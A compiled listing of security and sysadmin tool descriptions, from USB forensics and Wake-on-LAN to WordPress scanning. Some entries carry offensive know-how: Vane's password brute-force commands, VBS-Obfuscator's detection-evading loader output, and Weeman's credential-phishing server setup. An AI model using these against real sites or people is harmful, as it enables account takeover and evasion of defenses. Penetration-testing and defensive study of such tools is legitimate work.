    Dumping events and artifacts from setupapi.dev.log log file :
    To dump all USB devices installation events (generally first use of devices) from the setupapi.dev.log log file, use the "-sa" flag.
    PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -sa
    USBTracker alpha
    2015 - Sysinsider
    
    USBTracker it's a free tool which allow you to extract some USB artifacts from a Windows OS (Vista and later).
    You must execute USBTracker inside a CMD/Powershell console runnnig with administror privileges to be able to dump some log files artifacts.
    
    >>>  [Setup online Device Install (Hardware initiated) - usb\vid_0930&pid_6544\0019b931d970c8c0c5db00b9]
    >>>  Section start 2015/01/18 21:31:02.314
    
    >>>  [Setup online Device Install (Hardware initiated) - storage\volume\_??_usbstor#disk&ven_kingston&prod_datatraveler_2.0&rev_1.00#0019b931d970c8c0c5db00b9&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}]
    >>>  Section start 2015/01/18 21:31:28.241
    
    >>>  [Setup online Device Install (Hardware initiated) - WpdBusEnumRoot\UMB\2&37c186b&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_KINGSTON&PROD_DATATRAVELER_2.0&REV_1.00#0019B931D970C8C0C5DB00B9&0#]
    >>>  Section start 2015/01/18 21:31:30.956
    
    >>>  [Setup online Device Install (Hardware initiated) - usb\root_hub20\4&56dcbd&0]
    >>>  Section start 2015/01/18 21:31:59.457
    
    >>>  [Setup online Device Install (Hardware initiated) - usb\root_hub\4&38d808bf&0]
    >>>  Section start 2015/01/18 21:32:28.925
    
    >>>  [Setup online Device Install (Hardware initiated) - usb\root_hub\4&fee3d1d&0]
    >>>  Section start 2015/01/18 21:32:31.593
    
    >>>  [Setup online Device Install (Hardware initiated) - usb\root_hub20\4&3a831ac0&0]
    >>>  Section start 2015/01/18 21:32:32.825
    
    >>>  [Setup online Device Install (Hardware initiated) - usb\vid_0458&pid_0137\5&1d8fb94c&0&3]
    >>>  Section start 2015/01/18 21:32:36.866
    
    >>>  [Setup online Device Install (Hardware initiated) - usb\vid_05ac&pid_8242\5&1d8fb94c&0&5]
    >>>  Section start 2015/01/18 21:32:47.037
    
    >>>  [Setup online Device Install (Hardware initiated) - usb\vid_05ac&pid_8502\8t9a9e8d577k3l00]
    >>>  Section start 2015/01/18 21:32:48.160
    
    ...
    


    Download USBTracker

    UserProfilesView - View User Profiles Information On Your Windows


    UserProfilesView displays the list of all user profiles that you currently have in your system. For each user profile, the following information is displayed: Domain\User Name, Profile Path, Last Load Time, Registry File Size, User SID, and more. You can save the profiles list into text/xml/html/csv file.

    Versions History
    • Version 1.10
      • Added 'Run As Administrator' option (Ctrl+F11)
      • Added 'Registry Loaded' column (Yes/No), which specifies whether the Registry key of the user is loaded into HKEY_USERS key.
      • Added 'Logon Time' column, which specifies the logon time of the current logged on user.
      • UserProfilesView now displays the system users that it failed to get in previous versions.
    • Version 1.01 - Added command-line options for sorting.
    • Version 1.00 - First release.

    System Requirements

    This utility works with any version of Windows, starting from Windows 2000, and up to Windows 10.

    Using UserProfilesView

    UserProfilesView doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - UserProfilesView.exe
    After running it, the main window will display the all of all user profiles. You can select one or more items, and then save the list into xml/html/csv/xml file.

    Command-Line Options


    /stext <Filename> Save the list of all profiles into a regular text file.
    /stab <Filename> Save the list of all profiles into a tab-delimited text file.
    /scomma <Filename> Save the list of all profiles into a comma-delimited text file.
    /stabular <Filename> Save the list of all profiles into a tabular text file.
    /shtml <Filename> Save the list of all profiles into HTML file (Horizontal).
    /sverhtml <Filename> Save the list of all profiles into HTML file (Vertical).
    /sxml <Filename> Save the list of all profiles to XML file.
    /sort <column> This command-line option can be used with other save options for sorting by the desired column. If you don't specify this option, the list is sorted according to the last sort that you made from the user interface. The <column> parameter can specify the column index (0 for the first column, 1 for the second column, and so on) or the name of the column, like "Profile Path" and "User Name". You can specify the '~' prefix character (e.g: "~Last Load Time") if you want to sort in descending order. You can put multiple /sort in the command-line if you want to sort by multiple columns. Examples:
    UserProfilesView.exe.exe /shtml "f:\temp\profiles.html" /sort 2 /sort ~1
    UserProfilesView.exe.exe /shtml "f:\temp\profiles.html" /sort "User Name"
    /nosort When you specify this command-line option, the list will be saved without any sorting.      


    Download UserProfilesView

    Vane - WordPress Vulnerability Scanner (A GPL fork of WPScan)


    Vane is a GPL fork of the now non-free popular WordPress vulnerability scanner WPScan.

    INSTALL

    Prerequisites
    • Windows not supported
    • Ruby => 1.9
    • RubyGems
    • Git

    Installing on Debian/Ubuntu
    sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby libxml2 libxml2-dev libxslt1-dev ruby-dev
    git clone https://github.com/delvelabs/vane.git
    cd vane
    sudo gem install bundler && bundle install --without test development
    

    Installing on Fedora
    sudo yum install libcurl-devel
    git clone https://github.com/delvelabs/vane.git
    cd vane
    sudo gem install bundler && bundle install --without test development
    


    Installing on Archlinux
    pacman -Sy ruby
    pacman -Sy libyaml
    
    git clone https://github.com/delvelabs/vane.git
    cd vane
    sudo gem install bundler && bundle install --without test development
    
    gem install typhoeus
    gem install nokogiri
    

    Installing on Mac OS X
    git clone https://github.com/delvelabs/vane.git
    cd vane
    sudo gem install bundler && bundle install --without test development
    


    KNOWN ISSUES

    Typhoeus segmentation fault
    Update cURL to version => 7.21 (may have to install from source) See http://code.google.com/p/vane/issues/detail?id=81


    Proxy not working
    Update cURL to version => 7.21.7 (may have to install from source).
    Installation from sources :
    • Grab the sources from http://curl.haxx.se/download.html
    • Decompress the archive
    • Open the folder with the extracted files
    • Run ./configure
    • Run make
    • Run sudo make install
    • Run sudo ldconfig


    cannot load such file -- readline
    Run sudo aptitude install libreadline5-dev libncurses5-dev
    Then, open the directory of the readline gem (you have to locate it)
    cd ~/.rvm/src/ruby-1.9.2-p180/ext/readline
    ruby extconf.rb
    make
    make install
    
    See http://vvv.tobiassjosten.net/ruby-on-rails/fixing-readline-for-the-ruby-on-rails-console/ for more details


    VANE ARGUMENTS
    --update Update to the latest revision
    --url | -u The WordPress URL/domain to scan.
    --force | -f Forces WPScan to not check if the remote site is running WordPress.
    --enumerate | -e [option(s)] Enumeration. option : u usernames from id 1 to 10 u[10-20] usernames from id 10 to 20 (you must write [] chars) p plugins vp only vulnerable plugins ap all plugins (can take a long time) tt timthumbs t themes vp only vulnerable themes at all themes (can take a long time) Multiple values are allowed : '-e tt,p' will enumerate timthumbs and plugins If no option is supplied, the default is 'vt,tt,u,vp'
    --exclude-content-based '' Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied You do not need to provide the regexp delimiters, but you must write the quotes (simple or double)
    --config-file | -c Use the specified config file
    --follow-redirection If the target url has a redirection, it will be followed without asking if you wanted to do so or not
    --wp-content-dir WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed
    --wp-plugins-dir Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
    --proxy <[protocol://]host:port> Supply a proxy (will override the one from conf/browser.conf.json). HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported. If no protocol is given (format host:port), HTTP will be used
    --proxy-auth username:password Supply the proxy login credentials (will override the one from conf/browser.conf.json).
    --basic-auth username:password Set the HTTP Basic authentication
    --wordlist | -w Supply a wordlist for the password bruter and do the brute.
    --threads | -t The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)
    --username | -U Only brute force the supplied username.
    --help | -h This help screen.
    --verbose | -v Verbose output.

    VANE EXAMPLES
    Do 'non-intrusive' checks...
    ruby vane.rb --url www.example.com
    
    Do wordlist password brute force on enumerated users using 50 threads...
    ruby vane.rb --url www.example.com --wordlist darkc0de.lst --threads 50
    
    Do wordlist password brute force on the 'admin' username only...
    ruby vane.rb --url www.example.com --wordlist darkc0de.lst --username admin
    
    Enumerate installed plugins...
    ruby vane.rb --url www.example.com --enumerate p
    

    VANETOOLS ARGUMENTS
    --help    | -h   This help screen.
    --Verbose | -v   Verbose output.
    --update  | -u   Update to the latest revision.
    --generate_plugin_list [number of pages]  Generate a new data/plugins.txt file. (supply number of *pages* to parse, default : 150)
    --gpl  Alias for --generate_plugin_list
    --check-local-vulnerable-files | --clvf <local directory>  Perform a recursive scan in the <local directory> to find vulnerable files or shells
    

    VANETOOLS EXAMPLES
    Generate a new 'most popular' plugin list, up to 150 pages ...
    ruby vanetools.rb --generate_plugin_list 150
    
    Locally scan a WordPress installation for vulnerable files or shells :
    ruby vanetools.rb --check-local-vulnerable-files /var/www/wordpress/
    


    Download Vane

    VBS-Obfuscator - VBScript obfuscation to allow PenTesters bypass countermeasures


    VBScript obfuscation to allow PenTesters bypass countermeasures.

    Sample Script Output
    C:\tools>python obfuscator.py test.vbs out.vbs
    Char 109 -> 5505-5396
    Char 115 -> 1113775/9685
    Char 103 -> 540853/5251
    Char 98 -> -2629+2727
    Char 111 -> 291-180
    Char 120 -> 826320/6886
    Char 32 -> 118016/3688
    Char 34 -> -2379+2413
    Char 72 -> 2401-2329
    Char 101 -> -1347+1448
    Char 108 -> 759780/7035
    Char 108 -> 5391-5283
    Char 111 -> 743700/6700
    Char 32 -> 7654-7622
    Char 87 -> 636927/7321
    Char 111 -> -46+157
    Char 114 -> 7591-7477
    Char 108 -> -9028+9136
    Char 100 -> 285800/2858
    Char 33 -> 5241-5208
    Char 34 -> 7209-7175
    Char 44 -> 234080/5320
    Char 32 -> 104352/3261
    Char 118 -> -3369+3487
    Char 98 -> -7575+7673
    Char 79 -> -9140+9219
    Char 107 -> 4317-4210
    Char 79 -> -5433+5512
    Char 110 -> -1294+1404
    Char 108 -> 6672-6564
    Char 121 -> 1109-988
    Char 32 -> 166080/5190
    Char 43 -> 95675/2225
    Char 32 -> 3156-3124
    Char 118 -> -9572+9690
    Char 98 -> -3093+3191
    Char 73 -> 53947/739
    Char 110 -> -2239+2349
    Char 102 -> 554982/5441
    Char 111 -> 4953-4842
    Char 114 -> 907440/7960
    Char 109 -> 3406-3297
    Char 97 -> 3570-3473
    Char 116 -> 3624-3508
    Char 105 -> 137130/1306
    Char 111 -> 632-521
    Char 110 -> 8712-8602
    Char 44 -> 94468/2147
    Char 32 -> 14176/443
    Char 34 -> 884/26
    Char 84 -> -9768+9852
    Char 104 -> -5195+5299
    Char 105 -> 706335/6727
    Char 115 -> 6469-6354
    Char 32 -> 250304/7822
    Char 105 -> -9605+9710
    Char 115 -> 771190/6706
    Char 32 -> -1319+1351
    Char 97 -> 674053/6949
    Char 32 -> -6907+6939
    Char 109 -> 3365-3256
    Char 101 -> 170791/1691
    Char 115 -> 17020/148
    Char 115 -> 3217-3102
    Char 97 -> -6948+7045
    Char 103 -> -9545+9648
    Char 101 -> 9670-9569
    Char 98 -> 926002/9449
    Char 111 -> 130869/1179
    Char 120 -> 255600/2130
    Char 34 -> -1384+1418
    Char 42 -> 1784-1742
    Done!
    

    Results (comparison)
    First output
    Dim SzVeVmXkoEZx, LALrsGQYjZtj, kLTOaGJfsmSG
    SzVeVmXkoEZx = "6974-6865*602140/5236*45732/444*-8743+8841*8842-8731*5179-5059*-4646+4678*892-858*5573-5501*129-28*9855-9747*-6681+6789*-9095+9206*257184/8037*311721/3583*-7211+7322*741684/6506*-5620+5728*241300/2413*198-165*-9925+9959*6380-6336*5552-5520*-9222+9340*569-471*-6484+6563*6988-6881*128533/1627*-5150+5260*4828-4720*5616-5495*6062-6030*5407-5364*313728/9804*-9272+9390*-767+865*3735-3662*-2705+2815*-4151+4253*73704/664*-9531+9645*-7310+7419*-1882+1979*3171-3055*9554-9449*2676-2565*-1012+1122*107448/2442*4055-4023*-6753+6787*2058-1974*-5464+5568*428610/4082*2479-2364*-3013+3045*-9195+9300*128225/1115*56448/1764*-6899+6996*161760/5055*253752/2328*756288/7488*-4081+4196*29900/260*-3164+3261*-6830+6933*-6580+6681*-8764+8862*861360/7760*330840/2757*-2407+2441"
    LALrsGQYjZtj = Split(SzVeVmXkoEZx, chr(eval(261366/6223)))
    for each SKhxsIKQEybA in LALrsGQYjZtj
    kLTOaGJfsmSG = kLTOaGJfsmSG & chr(eval(SKhxsIKQEybA))
    next
    execute(kLTOaGJfsmSG)
    
    Second output
    Dim wEQHvB, vsSBaV, pwgtko
    wEQHvB = "-1912+2021*168-53*938948/9116*5796-5698*666666/6006*938-818*-4889+4921*-9635+9669*302112/4196*-9587+9688*-4950+5058*1012608/9376*-6763+6874*235232/7351*-8833+8920*412920/3720*1007190/8835*594432/5504*-5605+5705*1113-1080*9516-9482*347644/7901*181536/5673*198712/1684*615734/6283*779-700*6051-5944*-2574+2653*172370/1567*2086-1978*681472/5632*4765-4733*-2746+2789*54880/1715*2593-2475*733040/7480*-5259+5332*-7261+7371*103326/1013*-8585+8696*7371-7257*6640-6531*4564-4467*-6527+6643*62265/593*-1349+1460*2314-2204*-5438+5482*-5860+5892*4779-4745*1086-1002*-265+369*1276-1171*2588-2473*-2914+2946*101850/970*698050/6070*181760/5680*3610-3513*236896/7403*5004-4895*4565-4464*720245/6263*812360/7064*3582-3485*36977/359*4691-4590*482944/4928*-773+884*546720/4556*5235-5201"
    vsSBaV = Split(wEQHvB, chr(eval(1039-997)))
    for each KxRKRt in vsSBaV
    pwgtko = pwgtko & chr(eval(KxRKRt))
    next
    execute(pwgtko)
    


    Download VBS-Obfuscator

    VBScan - An Black Box vBulletin Vulnerability Scanner


    VBScan is a Black Box vBulletin vulnerability scanner. Written in Perl

    Demo on youtube:


    Security Bug Found by VBScan in Ubuntu / Fedora/ python forums by VBScan Vulnerability Scanner

    Report any bug to : me@reza.es

    Download VBScan

    WAIDPS - Wireless Auditing, Intrusion Detection & Prevention System


    WAIDPS is an open source wireless swissknife written in Python and work on Linux environment. This is a multipurpose tools designed for audit (penetration testing) networks, detect wireless intrusion (WEP/WPA/WPS attacks) and also intrusion prevention (stopping station from associating to access point). Apart from these, it will harvest all WiFi information in the surrounding and store in databases. This will be useful when it comes to auditing a network if the access point is ‘MAC filtered’ or ‘hidden SSID’ and there isn’t any existing client at that moment.

    WAIDS may be useful to penetration testers, wireless trainers, law enforcement agencies and those who is interested to know more about wireless auditing and protection. The primarily purpose for this script is to detect intrusion. Once wireless detect is found, it display on screen and also log to file on the attack. Additional features are added to current script where previous WIDS does not have are :
    • automatically save the attack packets into a file
    • interactive mode where users are allow to perform many functions
    • allow user to analyse captured packets
    • load previously saved pcap file or any other pcap file to be examine
    • customizing filters
    • customize detection threshold (sensitivity of IDS in detection)

    At present, WAIDS is able to detect the following wireless attacks and will subsequently add other detection found in the previous WIDS.
    • Association / Authentication flooding
    • Detect mass deauthentication which may indicate a possible WPA attack for handshake
    • Detect possible WEP attack using the ARP request replay method
    • Detect possible WEP attack using chopchop method
    • Detect possible WPS pin bruteforce attack by Reaver, Bully, etc.
    • Detection of Evil-Twin
    • Detection of Rogue Access Point

    The whole structure of the Wireless Auditing, Intrusion Detection & Prevention System will comprise of
    Harvesting WiFi Information         [Done]
    Intrusion Detection                         [Partially Done]
    Intrusion Prevention                       [Partially Done]
    Auditing (Testing network)            [Coming Soon]
    Other additional item include analyzing of packets, display of captured dump, display network barchart and much more.

    Requirements
    No special equipment is required to use this script as long as you have the following :
    1. Root access (admin)
    2. Wireless interface which is capable of monitoring and injection
    3. Python 2.7 installed
    4. Aircrack-NG suite installed
    5. TShark installed
    6. TCPDump installed
    7. Mergecap installed (for joining pcap files)
    8. xterm  installed
    Read more here.


    WakeMeOnLan v1.71 - Turn on computers on your network with Wake-on-LAN packet


    This utility allows you to easily turn on one or more computers remotely by sending Wake-on-LAN (WOL) packet to the remote computers.
    When your computers are turned on, WakeMeOnLan allows you to scan your network, and collect the MAC addresses of all your computers, and save the computers list into a file. Later, when your computers are turned off or in standby mode, you can use the stored computers list to easily choose the computer you want to turn on, and then turn on all these computers with a single click.
    WakeMeOnLan also allows you to turn on a computer from command-line, by specifying the computer name, IP address, or the MAC address of the remote network card.

    System Requirements And Limitations
    • On the computer that you run WakeMeOnLan: WakeMeOnLan works on any version of Windows, starting from Windows 2000 and up to Windows 8, including x64 versions of Windows.
    • On the remote computer: WakeMeOnLan can turn on the remote computer only if this feature is supported and enabled on the remote computer. Be aware that Wake-on-LAN feature only works on wired network. Wireless networks are not supported. 
      In order to enable the Wake-on-LAN feature on the remote computer:
      • On some computers, you may need to enable this feature on the BIOS setup.
      • In the network card properties, you should go to the 'Power Management' and/or 'Advanced' tabs of the network adapter, and turn on the Wake-on-LAN feature.  

    Start Using WakeMeOnLan
    WakeMeOnLan doesn't require any installation process or additional dll files. In order to start using it, simple run the executable file - WakeMeOnLan.exe
    After running WakeMeOnLan, the first thing to do is to scan your network and collect the MAC addresses/computer names/IP addresses on your network. In order to start the network scan, simply press F5. If WakeMeOnLan scans the wrong IP addresses range, you can stop the scan process by pressing F6, and then go to the 'Advanced Options' window (F9), and choose the correct IP addresses range to scan.
    All the computers information collected by WakeMeOnLan is saved into the configuration file (WakeMeOnLan.cfg) for loading it on the next time that you use WakeMeOnLan. You can also scan your network multiple times, and if there is a new computers on your network, it'll be added to the list. Scanning your network also updates the current status of every computer - 'on' (green icon) or 'off' (red icon). If there are obsolete computers on the list, you can remove them by using the 'Delete Selected Items' option.

    Turn On Remote Computers On Your Network
    After scanning your network in the first time, it's very easily to turn on the computers you need. Simply run WakeMeOnLan, select the desired computers, and then choose the 'Wake Up Selected Computer' option (F8).
    After using the 'Wake Up Selected Computer' option, you can run another network scan, to verify that the computers are really turned on. Turned on computers are displayed with green icon.

    External MAC Addresses File
    WakeMeOnLan uses an internal MAC Addresses database in order to display the company name of every network adapter. However, the internal database is not always updated with the latest MAC address assignments.
    You can manually download the latest MAC addresses file from http://standards-oui.ieee.org/oui.txt and then put oui.txt in the same folder where WakeMeOnLan.exe is located. When you run WakeMeOnLan.exe, it'll automatically load and use the external oui.txt instead of the internal MAC addresses database.

    Turn On a Computer From Command-Line
    WakeMeOnLan allows you to wake up a computer on your network without displaying any user interface, by using the /wakeup command-line option. You can specify the computer name, IP address, or the free user text that you typed in the properties window, as long as the computer information is stored inside the .cfg file. You can also specify the MAC address of the remote network card, even if the computer is not stored in the .cfg file.
    Optionally, you can specify the port number in the second parameter, and broadcast address in the third parameter.
    Examples:
    WakeMeOnLan.exe /wakeup 192.168.1.25
    WakeMeOnLan.exe /wakeup Comp01
    WakeMeOnLan.exe /wakeup Comp02
    WakeMeOnLan.exe /wakeup 40-65-81-A7-16-23
    WakeMeOnLan.exe /wakeup 406581A71623
    WakeMeOnLan.exe /wakeup Comp02 30000 192.168.0.255
    WakeMeOnLan.exe /wakeup 192.168.1.25 20000 192.168.1.255
    You can also wake up all computers in the list by using /wakeupall command-line option. Like in the /wakeup command-line option, you can optionally specify broadcast address and port number.
    Examples:
    WakeMeOnLan.exe /wakeupall
    WakeMeOnLan.exe /wakeupall 20000 192.168.2.255 If you want to wake up all computers in specific IP addresses range, you can use /wakeupiprange command-line option
    Examples:
    WakeMeOnLan.exe /wakeupiprange 192.168.0.25 192.168.0.100
    WakeMeOnLan.exe /wakeupiprange 192.168.0.11 192.168.0.20 20000 192.168.0.255

    Scan Your Network From Command-Line
    WakeMeOnLan allows you to scan your network and update the computers list on the .cfg file without displaying any user interface, by using the /scan command-line option:
    WakeMeOnLan.exe /scan
    You can also specify specific IP addresses range to scan, for example:
    WakeMeOnLan.exe /scan /UseIPAddressesRange 1 /IPAddressFrom 192.168.1.1 /IPAddressTo 192.168.1.254 /UseNetworkAdapter 0

    More Command-Line Options
    /IPAddressFrom <IP Address>
    /IPAddressTo <IP Address>
    Specifies the IP adderess range to scan.
    /UseIPAddressesRange <0 | 1> Specifies whether to scan with specific IP addresses range (Specified in /IPAddressFrom and /IPAddressTo command-line options)
    0 = No, 1 = Yes
    /UseNetworkAdapter <0 | 1> Specifies whether to scan the IP addresses range of the specified adapter (/NetworkAdapter)
    0 = No, 1 = Yes
    /UseNetworkAdapter <Name> Specifies the network adapter name when /UseNetworkAdapter is 1
    /MacAddressFormat <1 | 2 | 3> Specifies the MAC address format to display:
    1 = XX-XX-XX-XX-XX-XX
    2 = XX:XX:XX:XX:XX:XX
    3 = XXXXXXXXXXXX
    /UseNetBios <0 | 1> Specifies whether to use NetBIOS scan.
    0 = No, 1 = Yes
    /cfg <Filename> Start WakeMeOnLan with the specified configuration file. For example:
    WakeMeOnLan.exe /cfg "c:\config\won.cfg"
    WakeMeOnLan.exe /cfg "%AppData%\WakeMeOnLan.cfg"
    /stext <Filename> Save the list of computers that you previously scanned into a simple text file.
    /stab <Filename> Save the list of computers that you previously scanned into a tab-delimited text file.
    /scomma <Filename> Save the list of computers that you previously scanned into a comma-delimited text file (csv).
    /stabular <Filename> Save the list of computers that you previously scanned into a tabular text file.
    /shtml <Filename> Save the list of computers that you previously scanned into HTML file (Horizontal).
    /sverhtml <Filename> Save the list of computers that you previously scanned into HTML file (Vertical).
    /sxml <Filename> Save the list of computers that you previously scanned into XML file.
    /sort <column> This command-line option can be used with other save options for sorting by the desired column. If you don't specify this option, the list is sorted according to the last sort that you made from the user interface. The <column> parameter can specify the column index (0 for the first column, 1 for the second column, and so on) or the name of the column, like "Computer Name" and "Workgroup". You can specify the '~' prefix character (e.g: "~MAC Address") if you want to sort in descending order. You can put multiple /sort in the command-line if you want to sort by multiple columns. Examples:
    WakeMeOnLan.exe /shtml "c:\temp\WakeMeOnLan.html" /sort 2 /sort ~1
    WakeMeOnLan.exe /shtml "c:\temp\WakeMeOnLan.html" /sort "Workgroup" /sort "Computer Name"
    /nosort When you specify this command-line option, the list will be saved without any sorting.     


    Download WakeMeOnLan v1.71

    Waldo - Multithreaded Directory and Subdomain Bruteforcer

    Waldo is a lightweight and multithreaded directory and subdomain bruteforcer implemented in Python. It can be used to locate hidden web resources and undiscovered subdomains of the specified target.

    Key Features
    • Quickly and easily generate a list of all subdomains of target domain
    • Discover hidden web resources that can be potentially leveraged as part of an attack
    • Written in Python and very portable
    • Fast, multithreaded design

    Setup
    Dependencies can be installed by running:
    $ pip install -r pip.req
    To run the waldo:
    $ python waldo.py
    Usage To enumerate subdomains at some-fake-site.example, execute the following:
    $ python waldo.py -m s -d some-fake-site.example
    To enumerate directories at some-fake-site.example, execute the following:
    $ python waldo.py -m d -d some-fake-site.example
    By default, output will be logged to waldo-output.txt. To specify a custom output file, use the -l flag:
    $ python waldo.py -m s -l my-log-file.txt -d some-fake-site.example
    Waldo uses 4 threads by default. To specify a custom threadpool size, use the -t flag:
    $ python waldo.py -m s -d some-fake-site.example -t 15


    Download Waldo

    WAP - Web Application Protection


    WAP is a source code static analysis and data mining tool to detect and correct input validation vulnerabilities in web applications written in PHP (version 4.0 or higher) with a low rate of false positives.

    WAP detects and corrects the following vulnerabilities:
    • SQL Injection (SQLI)
    • Cross-site scripting (XSS)
    • Remote File Inclusion (RFI)
    • Local File Inclusion (LFI)
    • Directory Traversal or Path Traversal (DT/PT)
    • Source Code Disclosure (SCD)
    • OS Command Injection (OSCI)
    • PHP Code Injection

    This tool semantically analyses the source code. More precisely, it does taint analysis (data-flow analysis) to detect the input validation vulnerabilities. The aim of the taint analysis is to track malicious inputs inserted by entry points ($_GET, $_POST arrays) and to verify if they reach some sensitive sink (PHP functions that can be exploited by malicious input). After the detection, the tool uses data mining to confirm if the vulnerabilities are real or false positives. At the end, the real vulnerabilities are corrected with the insertion of the fixes (small pieces of code) in the source code.
    WAP is written in Java language and is constituted by three modules:

    • Code Analyzer: composed by the tree generator and taint analyzer. The tool has integrated a lexer and a parser generated by ANTLR, and based in a grammar and a tree grammar written to PHP language. The tree generator uses the lexer and the parser to build the AST (Abstract Sintatic Tree) to each PHP file. The taint analyzer performs the taint analysis navigating through the AST to detect potentials vulnerabilities.

    • False Positives Predictor: composed by a supervised trained data set with instances classified as being vulnerabilities and false positives and by the Logistic Regression machine learning algorithm. For each potential vulnerability detected by code analyzer, this module collects the presence of the attributes that define a false positive. Then, the Logistic Regression algorithm receives them and classifies the instance as being a false positive or not (real vulnerability).

    • Code Corrector: Each real vulnerability is removed by correction of its source code. This module for the type of vulnerability selects the fix that removes the vulnerability and signalizes the places in the source code where the fix will be inserted. Then, the code is corrected with the insertion of the fixes and new files are created.     

    Download WAP

    Watcher v1.5.8 - Web Security Testing Tool and Passive Vulnerability Scanner


    Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Being passive means it won't damage production systems, it's completely safe to use in Cloud computing, shared hosting, and dedicated hosting environments. Watcher detects Web-application security issues as well as operational configuration issues. Watcher provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads (potential XSS), cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.

    Major Features:
    1. Passive detection of security, privacy, and PCI compliance issues in HTTP, HTML, Javascript, CSS, and development frameworks (e.g. ASP.NET, JavaServer)
    2. Works seamlessly with complex Web 2.0 applications while you drive the Web browser
    3. Non-intrusive, will not raise alarms or damage production sites
    4. Real-time analysis and reporting - findings are reported as they’re found, exportable to XML, HTML, and Team Foundation Server (TFS)
    5. Configurable domains with wildcard support
    6. Extensible framework for adding new checks

    Watcher is built as a plugin for the Fiddler HTTP debugging proxy available at www.fiddlertool.com. Fiddler provides all of the rich functionality of a good Web/HTTP proxy. With Fiddler you can capture all HTTP traffic, intercept and modify, replay requests, and much much more. Fiddler provides the HTTP proxy framework for Watcher to work in, allowing for seamless integration with today’s complex Web 2.0 or Rich Internet Applications. Watcher runs silently in the background while you drive your browser and interact with the Web-application.

    Watcher is built in C# as a small framework with 30+ checks already included. It's built so that new checks can be easily created to perform custom audits specific to your organizational policies, or to perform more general-purpose security assessments. Examples of the types of issues Watcher will currently identify:
    • ASP.NET VIEWSTATE insecure configurations
    • JavaServer MyFaces ViewState without cryptographic protections
    • Cross-domain stylesheet and javascript references
    • User-controllable cross-domain references
    • User-controllable attribute values such as href, form action, etc.
    • User-controllable javascript events (e.g. onclick)
    • Cross-domain form POSTs
    • Insecure cookies which don't set the HTTPOnly or secure flags
    • Open redirects which can be abused by spammers and phishers
    • Insecure Flash object parameters useful for cross-site scripting
    • Insecure Flash crossdomain.xml
    • Insecure Silverlight clientaccesspolicy.xml
    • Charset declarations which could introduce vulnerability (non-UTF-8)
    • User-controllable charset declarations
    • Dangerous context-switching between HTTP and HTTPS
    • Insufficient use of cache-control headers when private data is concerned (e.g. no-store)
    • Potential HTTP referer leaks of sensitive user-information
    • Potential information leaks in URL parameters
    • Source code comments worth a closer look
    • Insecure authentication protocols like Digest and Basic
    • SSL certificate validation errors
    • SSL insecure protocol issues (allowing SSL v2)
    • Unicode issues with invalid byte streams
    • Sharepoint insecurity checks
    • more….

    Reducing false positives is a high priority, suggestions are welcome. Right now each check takes steps to reduce false positives, some better than others, and checks can be individually disabled if they’re generating too much noise.

    Release Notes

    Watcher.zip contains the two DLL's for manual installation of the plugin - drop them in your Fiddler2\Scripts user or program files folder.
    WatcherSetup.exe is an installer built with NSIS that will copy the two DLL's into either your Fiddler2\Scripts user or program files folder.
    WatcherTFS.zip contains the Team Foundation Server (TFS) component which Watcher uses to export results to TFS. Installation and further instructions are included in the ZIP file.

    Program Watcher Passive Web Security Tool for Fiddler
    Version 1.5.8
    Release 25-June-2013
    License Custom Open Source
    Authors Chris Weber
    Testers Chris Weber
    Contact chris@casaba.com
    Website http://websecuritytool.codeplex.com/
    Company http://www.casaba.com/
    Copyright (c) 2010 - 2013 Casaba Security, LLC. All Rights Reserved.

    {"
    +++ major new feature
    + minor new feature
    * changed feature
    % improved performance or quality
    ! fixed minor bug
    !!! fixed major bug

    v1.5.8 2013-06-25
    ! Fixed bug in SSL certificate validation


    Download  Watcher v1.5.8

    Web Security Dojo - Training Environment for Web Application Security Penetration Testing


    A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo

    What?
    Various web application security testing tools and vulnerable web applications were added to a clean install of Ubuntu v10.04.2, which is patched with the appropriate updates and VM additions for easy use.

    Why?
    The Web Security Dojo is for learning and practicing web app security testing techniques. It is ideal for self-teaching and skill assessment, as well as training classes and conferences since it does not need a network connection. The Dojo contains everything needed to get started – tools, targets, and documentation.

    Feature Overview
    Targets include:
    • OWASP’s WebGoat
    • Google’s Gruyere
    • Damn Vulnerable Web App
    • Hacme Casino
    • OWASP InsecureWebApp
    • w3af’s test website
    • simple training targets by Maven Security (including REST and JSON)

    Tools: (starred = new this version)
    • Burp Suite (free version)
    • w3af
    • sqlmap
    • arachni *
    • metasploit
    • Zed Attack Proxy *
    • OWASP Skavenger
    • OWASP Dirbuster
    • Paros
    • Webscarab
    • Ratproxy
    • skipfish
    • websecurify
    • davtest
    • J-Baah
    • JBroFuzz
    • Watobo *
    • RATS
    • helpful Firefox add-ons

    Weeman - HTTP Server for Phishing


    HTTP server for phishing in python. Weeman has support for most of the (bigest) websites.
    Usually you will want run Weeman with DNS spoof attack. (see dsniff, ettercap).

    Weeman will do the following steps:
    1. Create fake html page.
    2. Wait for clients
    3. Grab the data (POST).
    4. Try to login the client to the original page

    Requirements
    • Python <= 2.7.
    • Python BeautifulSoup 4

    Install BeautifulSoup
    • Archlinux - sudo pacman -S python2-beautifulsoup4
    • Ubuntu/Linuxmint - sudo apt-get install python-bs4
    • For another OS: - sudo pip install beautifulsoup4

    Platforms
    • Linux (any)
    • Mac (Not tested)
    • Windows (Not tested)
    [!] If weeman runs on your platform (Mac/Windows), please let me know.

    Usage
    Just type help

    Run server:
    • For port 80 you need to run Weeman as root!
    • Host to clone (Ex: www.social-networks.local)
      set url http://localhost
    • "<"form action = "TAKE THIS URL">"(View the site source and take the URL)
      set action_url http://localhost/sendlogin 
    • The port Weeman server will listen
      set port 2020
    • Start the server
      run

    The settings will be saved for the next time you run weeman.py.


    Download Weeman

